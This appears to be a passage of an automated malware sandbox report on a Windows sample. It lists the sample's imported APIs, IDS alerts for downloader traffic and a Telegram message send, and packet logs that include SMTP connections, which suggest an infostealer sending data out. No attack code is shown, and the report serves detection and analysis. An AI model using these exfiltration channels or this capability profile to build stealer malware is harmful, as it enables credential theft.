FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:15:33.467635+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-10T23:15:34.326975+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-10T23:15:34.893400+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-10T23:15:36.359786+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.130.0	80	TCP
2025-01-10T23:15:36.941517+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49724	104.21.80.1	443	TCP
2025-01-10T23:15:37.483224+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49730	193.122.130.0	80	TCP
2025-01-10T23:15:44.652830+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49792	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:15:30.735137939 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:30.739969969 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:30.740035057 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:30.740289927 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:30.745078087 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:32.297421932 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:32.301292896 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:32.306222916 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:33.421963930 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:33.467634916 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:33.470345974 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:33.470444918 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:33.470526934 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:33.477219105 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:33.477257967 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:33.985451937 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:33.985588074 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:33.990696907 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:33.990730047 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:33.991291046 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.036660910 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.079353094 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.159017086 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.159190893 CET	443	49706	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.159301043 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.165934086 CET	49706	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.169343948 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.174158096 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:34.273488998 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:34.276045084 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.276104927 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.276180029 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.276468992 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.276490927 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.326975107 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.755198956 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.757751942 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.757848024 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.893524885 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.893680096 CET	443	49712	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:34.893748999 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.894612074 CET	49712	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:34.899430990 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.901874065 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.904396057 CET	80	49704	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:34.904443979 CET	49704	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.906764984 CET	80	49717	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:34.906852961 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.906992912 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:34.911770105 CET	80	49717	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:36.313076973 CET	80	49717	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:36.314202070 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.314249039 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.314351082 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.314593077 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.314604998 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.359786034 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.784976006 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.820240021 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.820260048 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.941490889 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.941570044 CET	443	49724	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:36.941632032 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.942177057 CET	49724	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:36.946232080 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.947952032 CET	49730	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.951236963 CET	80	49717	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:36.951302052 CET	49717	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.952801943 CET	80	49730	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:36.952862024 CET	49730	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.952953100 CET	49730	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:36.957676888 CET	80	49730	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:37.435714960 CET	80	49730	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:37.437242985 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:37.437303066 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:37.437403917 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:37.437657118 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:37.437675953 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:37.483223915 CET	49730	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:37.921297073 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:37.923240900 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:37.923254013 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:38.080452919 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:38.080516100 CET	443	49736	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:38.080615997 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:38.081090927 CET	49736	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:38.085236073 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:38.090109110 CET	80	49742	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:38.091844082 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:38.091998100 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:38.096854925 CET	80	49742	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:38.543535948 CET	80	49742	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:38.545124054 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:38.545197964 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:38.545315981 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:38.545576096 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:38.545609951 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:38.592633963 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.024925947 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.026479959 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.026515007 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.185429096 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.185492039 CET	443	49743	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.185561895 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.187796116 CET	49743	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.193655968 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.194617987 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.198590040 CET	80	49742	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:39.198649883 CET	49742	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.199367046 CET	80	49749	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:39.199423075 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.265113115 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:39.269954920 CET	80	49749	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:39.705739975 CET	80	49749	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:39.706862926 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.706895113 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.706959963 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.707215071 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:39.707230091 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:39.748872042 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.187422037 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.189205885 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.189227104 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.340141058 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.340202093 CET	443	49755	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.340272903 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.340852976 CET	49755	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.344499111 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.345676899 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.350112915 CET	80	49749	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:40.350167036 CET	49749	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.351078033 CET	80	49758	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:40.351279020 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.351279020 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:40.357970953 CET	80	49758	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:40.842632055 CET	80	49758	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:40.844382048 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.844417095 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.844481945 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.844800949 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:40.844814062 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:40.889611006 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.311270952 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:41.319267988 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.319324017 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:41.457405090 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:41.457453966 CET	443	49766	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:41.457510948 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.457986116 CET	49766	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.462244987 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.463249922 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.467250109 CET	80	49758	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:41.467319965 CET	49758	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.468046904 CET	80	49772	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:41.468142033 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.468300104 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:41.473067999 CET	80	49772	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:41.978868008 CET	80	49772	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:41.980246067 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.980297089 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:41.980608940 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.980864048 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:41.980890036 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:42.030097008 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.445756912 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:42.456051111 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:42.456135988 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:42.596250057 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:42.596323013 CET	443	49775	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:42.596498966 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:42.596776962 CET	49775	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:42.600502968 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.601255894 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.605444908 CET	80	49772	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:42.605499983 CET	49772	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.606054068 CET	80	49780	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:42.606192112 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.606266022 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:42.611030102 CET	80	49780	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:43.079130888 CET	80	49780	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:43.080852032 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.080916882 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.081154108 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.081487894 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.081502914 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.124093056 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:43.554136992 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.561816931 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.561837912 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.696255922 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.696319103 CET	443	49786	104.21.80.1	192.168.2.5
Jan 10, 2025 23:15:43.696388960 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.696815968 CET	49786	443	192.168.2.5	104.21.80.1
Jan 10, 2025 23:15:43.715679884 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:43.721376896 CET	80	49780	193.122.130.0	192.168.2.5
Jan 10, 2025 23:15:43.721535921 CET	49780	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:43.724175930 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:43.724201918 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:43.724312067 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:43.724874020 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:43.724886894 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.407041073 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.407131910 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:44.416630983 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:44.416645050 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.416878939 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.418613911 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:44.459325075 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.652852058 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.652915955 CET	443	49792	149.154.167.220	192.168.2.5
Jan 10, 2025 23:15:44.652968884 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:44.660470009 CET	49792	443	192.168.2.5	149.154.167.220
Jan 10, 2025 23:15:50.188580036 CET	49730	80	192.168.2.5	193.122.130.0
Jan 10, 2025 23:15:50.793379068 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:50.798165083 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:50.798299074 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:52.528008938 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:52.528273106 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:52.533112049 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:52.846332073 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:52.846765041 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:52.851656914 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.241291046 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.241724014 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.246608019 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.565690994 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.565731049 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.565745115 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.565777063 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.565817118 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.565840006 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.566618919 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.566638947 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.566685915 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.584794998 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.589584112 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.911796093 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:53.923333883 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:53.928162098 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:54.239691973 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:54.245285988 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:54.250194073 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:54.563843012 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:54.564356089 CET	49830	587	192.168.2.5	166.62.28.135
